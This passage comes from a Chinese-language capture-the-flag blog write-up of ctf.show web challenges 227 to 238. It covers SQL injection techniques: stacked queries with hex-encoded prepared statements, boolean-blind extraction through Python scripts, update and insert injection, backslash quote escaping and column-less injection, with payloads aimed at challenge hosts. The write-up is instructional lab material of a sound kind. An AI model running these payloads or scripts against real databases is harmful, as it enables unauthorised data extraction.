<li>搜了个遍，没找到flag，最后发现information_schema.routines这个表是存放函数和存储过程字段的。我们查看一下这个表，关于函数的存储过程，看看网上这篇文章<a href="https://blog.csdn.net/qq_41573234/article/details/80411079" target="_blank" rel="noopener">MySQL——查看存储过程和函数</a></li>
</ul>
</blockquote>
<p><strong>payload，查看routines的所有字段和数据</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://faa7806b-aae1-4405-8c64-1600655bcd26.challenge.ctf.show:<span class="number">8080</span>/api/?username=user1<span class="string">';prepare gylq from 0x73656C656374202A2066726F6D20696E666F726D6174696F6E5F736368656D612E726F7574696E6573;execute gylq;</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801141034167.png" alt="image-20210801141034167"></p>
<p>可以直接用<code>1&#39;;call getflag();</code>来调用这个函数，不过这个所有字段里已经可以找到flag</p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801141215295.png" alt="image-20210801141215295"></p>
<h2 id="web228"><a href="#web228" class="headerlink" title="web228"></a>web228</h2><blockquote>
<ul>
<li>和web226一样的做法，转十六进制</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://abd0d622-b6b8-48c7-98f3-9a49f3996b1b.challenge.ctf.show:<span class="number">8080</span>/api/?username=user1<span class="string">';prepare gylq from 0x73656C656374202A2066726F6D2063746673685F6F775F666C616761736161;execute gylq;</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web229"><a href="#web229" class="headerlink" title="web229"></a>web229</h2><blockquote>
<ul>
<li>和上题一样,估计没招了</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://74ea40ed-fc20-471c-8d2e-05cbd44aadad.challenge.ctf.show:<span class="number">8080</span>/api/?username=user1<span class="string">';prepare gylq from 0x73656C656374202A2066726F6D20666C6167;execute gylq;</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web230"><a href="#web230" class="headerlink" title="web230"></a>web230</h2><blockquote>
<ul>
<li>堆叠注入的精髓就是预处理和转十六进制么，和上题一样</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://bde7f4f9-1def-42cf-afee-da3025b6550a.challenge.ctf.show:<span class="number">8080</span>/api/?username=user1<span class="string">';prepare gylq from 0x73656C656374202A2066726F6D20666C61676161626278;execute gylq;</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web231"><a href="#web231" class="headerlink" title="web231"></a>web231</h2><blockquote>
<ul>
<li>我看到第一眼，就想着写个脚本，看了别人wp发现不用写布尔脚本，但是我写了，所以就用脚本梭哈</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="comment">#import time</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># def generateNum(num):</span></span><br><span class="line"><span class="comment">#     res = 'true'</span></span><br><span class="line"><span class="comment">#     if num == 1:</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"><span class="comment">#     else:</span></span><br><span class="line"><span class="comment">#         for i in range(num-1):</span></span><br><span class="line"><span class="comment">#             res += "+true"</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://06b28180-71ea-4f89-a05a-7d6baaf18696.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#password=1234567811&amp;username=ctfshow' and if(substr(database(),1,1)='c',1,0)#</span></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line"><span class="comment">#--------查表</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()"</span></span><br><span class="line"><span class="comment">#--------查字段</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flaga'"</span></span><br><span class="line"><span class="comment">#--------查flag</span></span><br><span class="line">sql= <span class="string">"select group_concat(flagas) from flaga"</span></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line">payload = <span class="string">"ctfshow' and if(substr((&#123;&#125;),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#计数</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        params = &#123;</span><br><span class="line">            <span class="string">'username'</span> : payload.format(sql,i,j),</span><br><span class="line">            <span class="string">'password'</span> : <span class="string">"&#123;&#125;"</span>.format(i)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url = url, data = params)</span><br><span class="line">        <span class="comment">#print(res.text)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">r"\u66f4\u65b0\u6210\u529f"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<blockquote>
<ul>
<li>第二种方式，了解一下性质，学习学习。</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql = "<span class="keyword">update</span> ctfshow_user <span class="keyword">set</span> pass = <span class="string">'&#123;$password&#125;'</span> <span class="keyword">where</span> username = <span class="string">'&#123;$username&#125;'</span>;";</span><br></pre></td></tr></table></figure></div>

<p>他语句是这样，那我们拼接一下成</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update ctfshow_user set pass &#x3D; &#39;1&#39;,username&#x3D;database()# where username &#x3D; &#39;&#123;$username&#125;&#39;; #后面就的被注释掉了</span><br></pre></td></tr></table></figure></div>

<p><strong>就有这样的效果</strong></p>
<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801150934264.png" alt="image-20210801150934264"></p>
<p><strong>这样不就任意语句执行了。</strong></p>
<p><strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=ctfshow&amp;password=1' ,username=database()<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p><strong>拿flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=ctfshow&amp;password=1' ,username=(<span class="keyword">select</span> <span class="keyword">group_concat</span>(flagas) <span class="keyword">from</span> flaga)<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801151123611.png" alt="image-20210801151123611"></p>
<h2 id="web232"><a href="#web232" class="headerlink" title="web232"></a>web232</h2><blockquote>
<ul>
<li>上把盲注脚本直接梭哈，只不过加了个给密码md5加密而已，并没有改变之前代码的性质，我代码跟用户名有关，所以不变</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="comment">#import time</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># def generateNum(num):</span></span><br><span class="line"><span class="comment">#     res = 'true'</span></span><br><span class="line"><span class="comment">#     if num == 1:</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"><span class="comment">#     else:</span></span><br><span class="line"><span class="comment">#         for i in range(num-1):</span></span><br><span class="line"><span class="comment">#             res += "+true"</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://258da519-591d-4f61-b9af-c91ccb7af34f.challenge.ctf.show:8080/api/"</span></span><br><span class="line">str = <span class="string">"01234567890abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，"</span></span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="comment">#password=1234567811&amp;username=ctfshow' and if(substr(database(),1,1)='c',1,0)#</span></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line"><span class="comment">#--------查表</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()"</span></span><br><span class="line"><span class="comment">#--------查字段</span></span><br><span class="line"><span class="comment">#sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flagaa'"</span></span><br><span class="line"><span class="comment">#--------查flag</span></span><br><span class="line">sql= <span class="string">"select group_concat(flagass) from flagaa"</span></span><br><span class="line"><span class="comment">#*************************************************************************************************************************************************************</span></span><br><span class="line">payload = <span class="string">"ctfshow' and if(substr((&#123;&#125;),&#123;&#125;,1)='&#123;&#125;',1,0)#"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#计数</span></span><br><span class="line">n = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">666</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> str:</span><br><span class="line">        params = &#123;</span><br><span class="line">            <span class="string">'username'</span> : payload.format(sql,i,j),</span><br><span class="line">            <span class="string">'password'</span> : <span class="string">"&#123;&#125;"</span>.format(i)</span><br><span class="line">        &#125;</span><br><span class="line">        res = requests.post(url = url, data = params)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">r"\u66f4\u65b0\u6210\u529f"</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            flag += j</span><br><span class="line">            n += <span class="number">1</span></span><br><span class="line">            print(<span class="string">'[*] 开始盲注第&#123;&#125;位'</span>.format(n))</span><br><span class="line">            print(flag)</span><br><span class="line">            <span class="keyword">if</span> j == <span class="string">"&#125;"</span>:</span><br><span class="line">                print(<span class="string">'[*] flag is &#123;&#125;'</span>.format(flag))</span><br><span class="line">                exit()</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801152819566.png" alt="image-20210801152819566"></p>
<p><strong>注意，用了第一种方法的时候不要用第二种方法，容易打乱代码条件,同样的第二种方法也就是加了个括号paylaod</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=ctfshow&amp;password=12'),username=(database())<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801151650299.png" alt="image-20210801151650299"></p>
<h2 id="web233"><a href="#web233" class="headerlink" title="web233"></a>web233</h2><blockquote>
<ul>
<li>发现连着三题都可以用第一个盲注脚本跑出来，继续梭哈</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:孤桜懶契</span></span><br><span class="line"><span class="comment"># Date:2021/8/1</span></span><br><span class="line"><span class="comment"># blog: gylq.gitee.io</span></span><br><span class="line">import requests</span><br><span class="line"><span class="comment">#import time</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># def generateNum(num):</span></span><br><span class="line"><span class="comment">#     res = 'true'</span></span><br><span class="line"><span class="comment">#     if num == 1:</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"><span class="comment">#     else:</span></span><br><span class="line"><span class="comment">#         for i in range(num-1):</span></span><br><span class="line"><span class="comment">#             res += "+true"</span></span><br><span class="line"><span class="comment">#         return res</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = "http://8feb46d5-de26-4836-807f-3d7218bcb7ae.challenge.ctf.show:<span class="number">8080</span>/api/<span class="string">"</span></span><br><span class="line"><span class="string">str = "</span><span class="number">01234567890</span>abcdefghijklmnopqrstuvwxyz&#123;&#125;-()_,，<span class="string">"</span></span><br><span class="line"><span class="string">flag = ""</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#password=1234567811&amp;username=ctfshow' and if(substr(database(),1,1)='c',1,0)#</span></span><br><span class="line"><span class="string">#*************************************************************************************************************************************************************</span></span><br><span class="line"><span class="string">#--------查表</span></span><br><span class="line"><span class="string">#sql= "</span><span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()<span class="string">"</span></span><br><span class="line"><span class="string">#--------查字段</span></span><br><span class="line"><span class="string">#sql= "</span><span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'flag233333'</span><span class="string">"</span></span><br><span class="line"><span class="string">#--------查flag</span></span><br><span class="line"><span class="string">sql= "</span><span class="keyword">select</span> <span class="keyword">group_concat</span>(flagass233) <span class="keyword">from</span> flag233333<span class="string">"</span></span><br><span class="line"><span class="string">#*************************************************************************************************************************************************************</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">payload = "</span>ctfshow<span class="string">' and if(substr((&#123;&#125;),&#123;&#125;,1)='</span>&#123;&#125;<span class="string">',1,0)#"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#计数</span></span><br><span class="line"><span class="string">n = 0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">for i in range(1, 666):</span></span><br><span class="line"><span class="string">    for j in str:</span></span><br><span class="line"><span class="string">        params = &#123;</span></span><br><span class="line"><span class="string">            '</span>username<span class="string">' : payload.format(sql,i,j),</span></span><br><span class="line"><span class="string">            '</span><span class="keyword">password</span><span class="string">' : "&#123;&#125;".format(i)</span></span><br><span class="line"><span class="string">        &#125;</span></span><br><span class="line"><span class="string">        res = requests.post(url = url, data = params)</span></span><br><span class="line"><span class="string">        if r"\u66f4\u65b0\u6210\u529f" in res.text:</span></span><br><span class="line"><span class="string">            flag += j</span></span><br><span class="line"><span class="string">            n += 1</span></span><br><span class="line"><span class="string">            print('</span>[*] 开始盲注第&#123;&#125;位<span class="string">'.format(n))</span></span><br><span class="line"><span class="string">            print(flag)</span></span><br><span class="line"><span class="string">            if j == "&#125;":</span></span><br><span class="line"><span class="string">                print('</span>[*] flag <span class="keyword">is</span> &#123;&#125;<span class="string">'.format(flag))</span></span><br><span class="line"><span class="string">                exit()</span></span><br><span class="line"><span class="string">            break</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web234"><a href="#web234" class="headerlink" title="web234"></a>web234</h2><blockquote>
<ul>
<li>脚本跑不动了，过滤了单引号，这题考的是\实现单引号逃逸</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">原来的语句</span><br><span class="line"><span class="keyword">update</span> ctfshow_user <span class="keyword">set</span> pass = </span><br><span class="line"><span class="string">'&#123;$password&#125;'</span> <span class="keyword">where</span> username = <span class="string">'&#123;$username&#125;'</span>;</span><br><span class="line">加上\逃逸单引号</span><br><span class="line"><span class="keyword">update</span> ctfshow_user <span class="keyword">set</span> pass = </span><br><span class="line"><span class="string">'\'</span> <span class="keyword">where</span> username = <span class="string">'&#123;$username&#125;'</span>;</span><br><span class="line">pass里面的内容则变成' where username = </span><br><span class="line">username里面的值我们可以随意控制</span><br></pre></td></tr></table></figure></div>

<p><strong>查表payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>())<span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801160115328.png" alt="image-20210801160115328"></p>
<p>查字段<strong>payload</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="number">0x666C6167323361</span>)<span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<p>查<strong>flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="keyword">group_concat</span>(flagass23s3) <span class="keyword">from</span> flag23a)<span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web235"><a href="#web235" class="headerlink" title="web235"></a>web235</h2><blockquote>
<ul>
<li>这题过滤了information，ban了or和’，我们只能去找mysql里面的可以查表的表<code>mysql.innodb_table_stats</code>但是发现找不到其他里面包含字段的表了。所以只能想到无列名注入</li>
</ul>
</blockquote>
<p>可以参考一下</p>
<p><a href="https://www.jb51.net/article/134678.htm" target="_blank" rel="noopener">概述MySQL统计信息</a><br><a href="https://zhuanlan.zhihu.com/p/98206699" target="_blank" rel="noopener">CTF|mysql之无列名注入</a></p>
<p><strong>查表</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> mysql.innodb_table_stats )<span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<p><strong>payload查flag</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="string">`2`</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> flag23a1)a <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>) <span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<p><img src="https://gitee.com/gylq/cloudimages/raw/master/img/image-20210801164011222.png" alt="image-20210801164011222"></p>
<h2 id="web236"><a href="#web236" class="headerlink" title="web236"></a>web236</h2><blockquote>
<ul>
<li>他多过滤了一个flag，一样可以用上一个payload</li>
</ul>
</blockquote>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=,username=(<span class="keyword">select</span> <span class="string">`2`</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> * <span class="keyword">from</span> flaga)a <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>) <span class="comment">#&amp;password=\</span></span><br></pre></td></tr></table></figure></div>

<p><strong>我感觉没过滤，如果真过滤了，也可以base64转过去</strong></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username&#x3D;,username&#x3D;(select to_base64(&#96;2&#96;) from (select 1,2,3 union select * from flaga)a limit 1,1) #&amp;password&#x3D;\</span><br></pre></td></tr></table></figure></div>

<h2 id="web237"><a href="#web237" class="headerlink" title="web237"></a>web237</h2><blockquote>
<ul>
<li>经典insert注入</li>
</ul>
</blockquote>
<p>查表</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span> <span class="keyword">group_concat</span>(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>()));<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p>查字段</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span> <span class="keyword">group_concat</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">'flag'</span>));<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p>查flag</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span> flagass23s3 <span class="keyword">from</span> flag));<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<h2 id="web238"><a href="#web238" class="headerlink" title="web238"></a>web238</h2><blockquote>
<ul>
<li>过滤了空格，用括号</li>
</ul>
</blockquote>
<p>查表</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="SQL"><figure class="iseeu highlight /sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=gylq&amp;username=gylqtest',(<span class="keyword">select</span>(<span class="keyword">group_concat</span>(<span class="string">`table_name`</span>))<span class="keyword">from</span>(information_schema.tables)<span class="keyword">where</span><span class="string">`table_schema`</span>=<span class="keyword">database</span>()))<span class="comment">#</span></span><br></pre></td></tr></table></figure></div>

<p>查字段</p>
